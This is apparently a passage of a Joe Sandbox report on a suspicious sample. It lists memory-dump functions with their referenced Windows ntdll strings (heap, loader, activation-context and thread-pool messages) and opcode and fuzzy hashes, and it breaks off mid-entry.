                                            • Instruction ID: 39ebb8ffcb003506b1239d3d04da09668e86cdee4aaa71234e934141b0c85d0f
                                            • Opcode Fuzzy Hash: 09714579953658d79de7e3a25d96fb2f7a5f773de233d711ec45d64bb09cddf8
                                            • Instruction Fuzzy Hash: E891AF71908345AFD722EF65CD41FABBBE8BF84744F40092EFA8892151E735E904CB66
                                            Function 01A0273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A421D9, 01A422B1
                                            • SXS: %s() passed the empty activation context, xrefs: 01A421DE
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A422B6
                                            • .Local, xrefs: 01A028D8
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: b5464db8bd8c3ee2c7567730aecb44a3c5a7154f27abd1c6663b71a37c5f3cc7
                                            • Instruction ID: cbf30418ce6985b7fa5afc2daeff9631f6db145a1d737e2a1af84a94b0ecf691
                                            • Opcode Fuzzy Hash: b5464db8bd8c3ee2c7567730aecb44a3c5a7154f27abd1c6663b71a37c5f3cc7
                                            • Instruction Fuzzy Hash: 4FA19535940329DFDB26CF58E888BA9B7B5BF58354F1541EAE908E7291D7309E80CF90
                                            Function 01A04AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlDeactivateActivationContext, xrefs: 01A43425, 01A43432, 01A43451
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A4342A
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A43456
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A43437
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 3dfd4c712f5e280932bff88ad8c08c0786fab043d187f4d7e5085db3f32422be
                                            • Instruction ID: e5fe8df502f9756a69c825f5bf2475744bd6077ab135eb368248b1f34a1a5009
                                            • Opcode Fuzzy Hash: 3dfd4c712f5e280932bff88ad8c08c0786fab043d187f4d7e5085db3f32422be
                                            • Instruction Fuzzy Hash: DA613372600B229FDB23CF1DD981B6AB7E0FFC4B61F198519EA559B281C734E801CB91
                                            Function 019D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A31028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A3106B
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A30FE5
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A310AE
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 75a9f8ecdf2b6b8411cbb525bad3a27bb9c5d8ba18489704d8e9318057621fc4
                                            • Instruction ID: b0ae80e49dcb077ae6b99223993e49b39852af80830398dc5ef6b29e9eeb4f8c
                                            • Opcode Fuzzy Hash: 75a9f8ecdf2b6b8411cbb525bad3a27bb9c5d8ba18489704d8e9318057621fc4
                                            • Instruction Fuzzy Hash: 6471D0B19043059FCB21DF18C984F9B7FA8EF94764F404869F9488B24AD738D588CBD2
                                            Function 019F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpDynamicShimModule, xrefs: 01A3A998
                                            • apphelp.dll, xrefs: 019F2462
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A3A9A2
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A3A992
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: 003a55e251946c481c0ad89a6029488c6741a98d540753bfd7c9bb96239ff416
                                            • Instruction ID: d7c644ffef57bab0b4eafe9ecb1054b56def7ed1930ad202df60763622b1bb43
                                            • Opcode Fuzzy Hash: 003a55e251946c481c0ad89a6029488c6741a98d540753bfd7c9bb96239ff416
                                            • Instruction Fuzzy Hash: C231237AA00211AFDB32DF59D885BAA7BB4FFC4B04F16405DF955E7245C7B09842C780
                                            Function 019E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: , xrefs: 019E3264
                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019E327D
                                            • HEAP[%wZ]: , xrefs: 019E3255
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                            • API String ID: 0-617086771
                                            • Opcode ID: e531e6d92d1420daa2e4c6399e202057e7e122d44b3cb625248299ef64fc13c4
                                            • Instruction ID: 91fbec3f4d64379778c4f55c82891362d6d9bde0bd8881ba84965cf19ad3554a
                                            • Opcode Fuzzy Hash: e531e6d92d1420daa2e4c6399e202057e7e122d44b3cb625248299ef64fc13c4
                                            • Instruction Fuzzy Hash: 8292CE71A042499FEB26CF68C448BAEBBF5FF49310F18849DE849AB391D735A941CF50
                                            Function 019E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 8296bc94aaba1fac6062f7181cee2fdc8df0d01cfca2306ebec88156fefb31d7
                                            • Instruction ID: 71632c38287dc0960266b0d567454de00f05d0d98598c453f35c3af968518049
                                            • Opcode Fuzzy Hash: 8296bc94aaba1fac6062f7181cee2fdc8df0d01cfca2306ebec88156fefb31d7
                                            • Instruction Fuzzy Hash: F5F18B30B00606DFEB26CF68C998B6AB7F5FB84304F184569F45A9B381D774E981CB91
                                            Function 019F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: $@
                                            • API String ID: 2994545307-1077428164
                                            • Opcode ID: 0169d97918deb5bd34a976d1ef9c6283c3783cc04d588f4c5c0806b8b143448e
                                            • Instruction ID: 40f2e6880e8b0bcc64319413fe7684673072fa73ae3eaf39cb767aa5f886ae7f
                                            • Opcode Fuzzy Hash: 0169d97918deb5bd34a976d1ef9c6283c3783cc04d588f4c5c0806b8b143448e
                                            • Instruction Fuzzy Hash: D8C28071608341AFE729CF68C841BABBBE5AFC8754F04892EFA89D7241D734D845CB52
                                            Function 019CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: FilterFullPath$UseFilter$\??\
                                            • API String ID: 0-2779062949
                                            • Opcode ID: 1eca5122f1a6265128f033cc166184518c9ebfed0aac72389106c118ee5bfd6d
                                            • Instruction ID: fb7339188734ce4de3a5ffa89074870f01fa45dc43bdcbb078cb510c35efa158
                                            • Opcode Fuzzy Hash: 1eca5122f1a6265128f033cc166184518c9ebfed0aac72389106c118ee5bfd6d
                                            • Instruction Fuzzy Hash: 18A13A759116399BDB219B68CC88BAEB7B8EF44710F1001EAEA0DA7251E7359E84CF50
                                            Function 019F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpCheckModule, xrefs: 01A3A117
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A3A121
                                            • Failed to allocated memory for shimmed module list, xrefs: 01A3A10F
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: a21622f33f1b5ff7c5dd81fb2e46c1e483cd69f210f97f63da3762695757f358
                                            • Instruction ID: 2db4b9712fe12405517e4029b8fdf16e03f582db46c11065211d0a072538d6fb
                                            • Opcode Fuzzy Hash: a21622f33f1b5ff7c5dd81fb2e46c1e483cd69f210f97f63da3762695757f358
                                            • Instruction Fuzzy Hash: 2971DF75E00305AFDB25DF68C981BAEB7F9FB88304F18842DE94AD7256D734A942CB41
                                            Function 019E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 93c7ef75053662888884c8e159f29406375a17c59d399a53dea1336eb2ff5011
                                            • Instruction ID: 3c04b8f73fb2d1fe67463dcbfad6ff3975daa155dc4266ae6558851015a2d25c
                                            • Opcode Fuzzy Hash: 93c7ef75053662888884c8e159f29406375a17c59d399a53dea1336eb2ff5011
                                            • Instruction Fuzzy Hash: 7861A071B00305DFDB2ACF28C559B6ABBE5FF84704F188559F4998B292D7B0E881CB91
                                            Function 01A0C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A482E8
                                            • LdrpInitializePerUserWindowsDirectory, xrefs: 01A482DE
                                            • Failed to reallocate the system dirs string !, xrefs: 01A482D7
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: c29cb5be51b7aa3d595613c8263abc2a116609e53f77c557bd830dd068e11f38
                                            • Instruction ID: 7cee907a1de287f39050c1814bd9e32d74b587959139d6d27580029954d51d25
                                            • Opcode Fuzzy Hash: c29cb5be51b7aa3d595613c8263abc2a116609e53f77c557bd830dd068e11f38
                                            • Instruction Fuzzy Hash: D641F375544301AFD722EB68ED44B5B77E8FF84B64F044A2AF948D3294EB74E801CB91
                                            Function 01A8C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • PreferredUILanguages, xrefs: 01A8C212
                                            • @, xrefs: 01A8C1F1
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A8C1C5
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: e77e5ee7ce97bbb76dc8085442ea2e1e2228c3fdeb95aebc8f486b340c403f41
                                            • Instruction ID: 01947eea3fab42db0dafe04e6660c6c237c8c33818854c9ddbfbd3fc47ce6287
                                            • Opcode Fuzzy Hash: e77e5ee7ce97bbb76dc8085442ea2e1e2228c3fdeb95aebc8f486b340c403f41
                                            • Instruction Fuzzy Hash: 28417671D00219EBDF11FBD8C881FEEB7B8AB54710F14416AE609B7284E7749A44CF60
                                            Function 01A64144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 08d17eb6700fe776fa5dfadae13a5a7282b5b2f4b4629b5bb35080cb1adea40f
                                            • Instruction ID: 81fba93c8bda87f00078864d543bb5ebbf4ca99fc9ab7516eb1d65739c083688
                                            • Opcode Fuzzy Hash: 08d17eb6700fe776fa5dfadae13a5a7282b5b2f4b4629b5bb35080cb1adea40f
                                            • Instruction Fuzzy Hash: 5141EF71A04758CBEB26DBE9C944BADBBF8FF99340F28045AD905AB781D7358941CB10
                                            Function 01A54755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01A54899
                                            • LdrpCheckRedirection, xrefs: 01A5488F
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A54888
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: cfce4bb5bbae86223a7a2633ec222543e266c3a07c42c9c10240043ea4f79282
                                            • Instruction ID: 435f84d803d047ae91bb6483336acc41ea0046d2d58609134910095b68d774da
                                            • Opcode Fuzzy Hash: cfce4bb5bbae86223a7a2633ec222543e266c3a07c42c9c10240043ea4f79282
                                            • Instruction Fuzzy Hash: 0E41CF32A087519FCBA2CF69D940A667BE4AF8DA50F0A056DED5897311F731E880CB91
                                            Function 019E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 877027cd495495d70b926b86b82b4484bd704908c88c805173226bf3458864d3
                                            • Instruction ID: f7127984684a5277da8bb5938318d16d9d7d59b6a3a307ec0fa7abb8835d6912
                                            • Opcode Fuzzy Hash: 877027cd495495d70b926b86b82b4484bd704908c88c805173226bf3458864d3
                                            • Instruction Fuzzy Hash: 8A1190317151429FEF2ECA18C455B65B7E9FF80A16F1D811DF40ACB252D770D845C751
                                            Function 01A520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 01A520FA
                                            • Process initialization failed with status 0x%08lx, xrefs: 01A520F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01A52104
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: be3b5b10019357bfdc5efc3b4002fb7b5945e52f2bfd78768e464eb1da9248e0
                                            • Instruction ID: 5654b898384dea8a611a41f5271d14ecc472b87d05ee439fdc8146a0f1482166
                                            • Opcode Fuzzy Hash: be3b5b10019357bfdc5efc3b4002fb7b5945e52f2bfd78768e464eb1da9248e0
                                            • Instruction Fuzzy Hash: E3F0C279640308BFEB24E74DEE46FDA7B68FB80B54F140069FA046B685D2B0A901CA91
                                            Function 019E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: 3c523d8f04028ee3900fa54e171e302929294b42fb39ae9acd65a221b9d3c099
                                            • Instruction ID: 36f50d349b68ae8e8d5260a2ade80715cfd5c9196f66e2312c7967e367a3e091
                                            • Opcode Fuzzy Hash: 3c523d8f04028ee3900fa54e171e302929294b42fb39ae9acd65a221b9d3c099
                                            • Instruction Fuzzy Hash: C2714A71A0014A9FDB02DFA8CA94FAEBBF8FF48744F144065E905E7251EA34EE45CB60
                                            Function 019DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 019DAA25
                                            • LdrResSearchResource Enter, xrefs: 019DAA13
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: edb7d05037fa03b395c41961cc9f319a6319afda68902eae542fef45bf05c5a8
                                            • Instruction ID: 67191e90fc6d9fcba1fcd08597282b7d6562756f31ad5fb98bf4e30af2a5cf22
                                            • Opcode Fuzzy Hash: edb7d05037fa03b395c41961cc9f319a6319afda68902eae542fef45bf05c5a8
                                            • Instruction Fuzzy Hash: 36E1B171E04209AFEF22CFA9C980BAEBBBABF54310F148526F905E7241D778D951CB51
                                            Function 01A9A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 48288706600b1203beac56b3f7e960c94911822a5b449561112a7826247a42b1
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 9FC1C0312043429BEF25CF28C945B6BBBE5AFC4318F184A2EF696CB291D774D585CB81
                                            Function 01A4E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 0aebde58651bf0701f48cbfc48c60eaa0ced6bb242ce58991e8af355efb3cfe9
                                            • Instruction ID: 632756f598eac052bcb535c36aa881c13eb6c1bdf069b348a3f9e01860ee62e3
                                            • Opcode Fuzzy Hash: 0aebde58651bf0701f48cbfc48c60eaa0ced6bb242ce58991e8af355efb3cfe9
                                            • Instruction Fuzzy Hash: 54614B71E003199FEB15DFA9C980BAEBBF5FB88710F14406DE649EB251D735A900CB50
                                            Function 01A743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 85365eb48d13fe908813e0a5327311b818da0a24ce4439a824cf4719c6605e99
                                            • Instruction ID: 13fac79b82e66ff6acd683cb757fed50fe4f76a8f7b5f38424d253e259c00b68
                                            • Opcode Fuzzy Hash: 85365eb48d13fe908813e0a5327311b818da0a24ce4439a824cf4719c6605e99
                                            • Instruction Fuzzy Hash: F8510A71E0021DAFEB11DFA9CD90AEEBBB8EB48754F10452AE615B7290D7309E05CB60
                                            Function 019D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019D063D
                                            • kLsE, xrefs: 019D0540
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: 56f7f28dca2d8bbd21bdaf56626f21bc4ea9915f628c8092265e7525eccabd36
                                            • Instruction ID: 14bb35e3ccf6f37f5d192c8348b86715b9b8347033e13ff7eb7fe6dc11072b99
                                            • Opcode Fuzzy Hash: 56f7f28dca2d8bbd21bdaf56626f21bc4ea9915f628c8092265e7525eccabd36
                                            • Instruction Fuzzy Hash: 9B51EF715007428FD724EF29C5406A7BBE8AF84305F18893EFAEE87241E730D545CB92
                                            Function 019DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 019DA309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 019DA2FB
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 036f5f94fd3c58bf746866803b2dd1e4b5fa72b6a475ea217d058e96c796a4a9
                                            • Instruction ID: fbff43216e4aaff517b1babe5d8ef67ff6d599a03ec954fe903d79c25198ae28
                                            • Opcode Fuzzy Hash: 036f5f94fd3c58bf746866803b2dd1e4b5fa72b6a475ea217d058e96c796a4a9
                                            • Instruction Fuzzy Hash: 4841B231A04649DFEB15CF59C440B6DBBF5FF85700F1484A6E908DB291EBB6D940CB50
                                            Function 01A0A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: e5b4e49110d792805910479513038ba09098ea2f6923df6cc7bf806dc85ab400
                                            • Instruction ID: 7b36373f3aca620bccbdf43f7500bcaa1dd15543eeec44e7f9764b38f6adedcd
                                            • Opcode Fuzzy Hash: e5b4e49110d792805910479513038ba09098ea2f6923df6cc7bf806dc85ab400
                                            • Instruction Fuzzy Hash: C401D1B2240700AFE312DF14DE45B2677F8E785715F058939A64CCB190F734D805CB46
                                            Function 019DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 3a44eedcd420a78845667d6e8071e853420b91e5bdde41ca046eb5b44f30b445
                                            • Instruction ID: da2d4b681f9ef7b541f6cbf4a4842c417f0c7281d00964002e9cd223bdd39a04
                                            • Opcode Fuzzy Hash: 3a44eedcd420a78845667d6e8071e853420b91e5bdde41ca046eb5b44f30b445
                                            • Instruction Fuzzy Hash: D1826975E002198FEB25CFA9C980BEDBBB5BF48710F14C169E95DAB391DB30A941CB50
                                            Function 01A56420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2049163251.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_19a0000_tYEY1UeurGz0Mjb.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 06ecc31848c4b5403a9b64b26ab4e505c1bd3d6c07f2711eceadd413144134a5
